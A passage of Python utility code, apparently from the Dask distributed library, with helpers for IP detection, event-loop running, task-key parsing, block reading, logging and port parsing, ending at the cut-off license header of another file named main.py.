Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
    ValueError is raised if the interface doesn't exist, or if it does not
    have an IPv4 address associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
    # Tornado's PollIOLoop doesn't raise if used after being closed; check ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
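# A minimal usage sketch (assumed, not taken from the codebase): LoopRunner
# owns a background IO loop so that synchronous code can drive a coroutine via
# run_sync()/sync(). The coroutine below is purely illustrative.
def _example_loop_runner():
    async def _double(x):
        await asyncio.sleep(0)
        return 2 * x

    # run_sync() starts the loop in a daemon thread, runs the coroutine to
    # completion, and stops the loop again.
    return LoopRunner().run_sync(_double, 21)   # -> 42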
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
    # @contextmanager requires a generator, so yield rather than return; pass
    # the extension as the file suffix (not the positional ``mode`` argument).
    with tempfile.NamedTemporaryFile(suffix=extension) as f:
        yield f.name
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. Will correctly handle
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
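# A throwaway sketch (not part of distributed): combine the tmp_text() helper
# defined above with import_file() to load a one-off module from disk. The
# module name and contents are invented.
def _example_import_file():
    with tmp_text("distributed_utils_example_mod.py", "VALUE = 42\n") as fn:
        [mod] = import_file(fn)
        return mod.VALUE          # -> 42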
class itemgetter:
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def is_writeable(frame):
"""
Check whether frame is writeable
Will return ``True`` if writeable, ``False`` if readonly, and
``None`` if undetermined.
"""
try:
return not memoryview(frame).readonly
except TypeError:
return None
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def deprecated(*, version_removed: str = None):
"""Decorator to mark a function as deprecated
Parameters
----------
version_removed : str, optional
If specified, include the version in which the deprecated function
will be removed. Defaults to "a future release".
"""
def decorator(func):
nonlocal version_removed
msg = f"{funcname(func)} is deprecated and will be removed in"
if version_removed is not None:
msg += f" version {version_removed}"
else:
msg += " a future release"
@functools.wraps(func)
def wrapper(*args, **kwargs):
warnings.warn(msg, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapper
return decorator
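# Hypothetical usage of the decorator above; the helper and version string are
# invented for illustration.
@deprecated(version_removed="2021.03.0")
def _example_deprecated_helper():
    """Calling this emits a DeprecationWarning naming version 2021.03.0."""
    return None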
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
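# A small sketch (assumed usage): attach a DequeHandler to keep the most recent
# records of a logger in memory. The logger name and message are invented.
def _example_deque_handler():
    handler = DequeHandler(n=100)
    log = logging.getLogger("distributed.example")
    log.addHandler(handler)
    try:
        log.warning("something happened")
        return [record.getMessage() for record in handler.deque]
    finally:
        log.removeHandler(handler)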
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
is_server_extension = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
is_server_extension = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not is_server_extension:
is_kernel_and_no_running_loop = False
if is_kernel():
try:
asyncio.get_running_loop()
except RuntimeError:
is_kernel_and_no_running_loop = True
if not is_kernel_and_no_running_loop:
# TODO: Use tornado's AnyThreadEventLoopPolicy, instead of class below,
# once tornado > 6.0.3 is available.
if WINDOWS and hasattr(asyncio, "WindowsSelectorEventLoopPolicy"):
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
# https://github.com/tornadoweb/tornado/issues/2608
BaseEventLoopPolicy = asyncio.WindowsSelectorEventLoopPolicy
else:
BaseEventLoopPolicy = asyncio.DefaultEventLoopPolicy
class AnyThreadEventLoopPolicy(BaseEventLoopPolicy):
def get_event_loop(self):
try:
return super().get_event_loop()
except (RuntimeError, AssertionError):
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = set(
[
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
]
)
return k in cmd_params
return False
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
@functools.lru_cache(None)
def iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
def typename(typ):
"""Return name of type
Examples
--------
>>> from distributed import Scheduler
>>> typename(Scheduler)
'distributed.scheduler.Scheduler'
"""
try:
return typ.__module__ + "." + typ.__name__
except AttributeError:
return str(typ)
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for logs"""
def _repr_html_(self):
return "<pre><code>\n{log}\n</code></pre>".format(
log=html.escape(self.rstrip())
)
class Logs(dict):
"""A container for multiple logs"""
def _repr_html_(self):
summaries = [
"<details>\n"
"<summary style='display:list-item'>{title}</summary>\n"
"{log}\n"
"</details>".format(title=title, log=log._repr_html_())
for title, log in sorted(self.items())
]
return "\n".join(summaries)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
"Class %s does not support keyword %s" % (typename(cls), k)
)
else:
raise ValueError(
"Module %s does not support keyword %s" % (typename(cmd), k)
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
[["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()], []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
return await loop.run_in_executor(_offload_executor, lambda: fn(*args, **kwargs))
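# Illustrative only: await offload() to push blocking, CPU-bound work onto the
# single-threaded "Dask-Offload" executor so the event loop stays responsive.
# The hashing workload is made up.
async def _example_offload():
    import hashlib
    digest = await offload(hashlib.sha256, b"x" * 2 ** 20)
    return digest.hexdigest()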
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
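# Tiny usage sketch (keys and values invented): the least recently *looked-up*
# key is evicted once maxsize is exceeded.
def _example_lru():
    cache = LRU(maxsize=2)
    cache["a"] = 1
    cache["b"] = 2
    cache["a"]            # touch "a", so "b" becomes the eviction candidate
    cache["c"] = 3        # evicts "b"
    return sorted(cache)  # -> ['a', 'c']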
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> List[Dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
|
main.py
|
#!/usr/bin/env python
'''
Copyright 2016-2017 Benjamin Elder (BenTheElder) All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
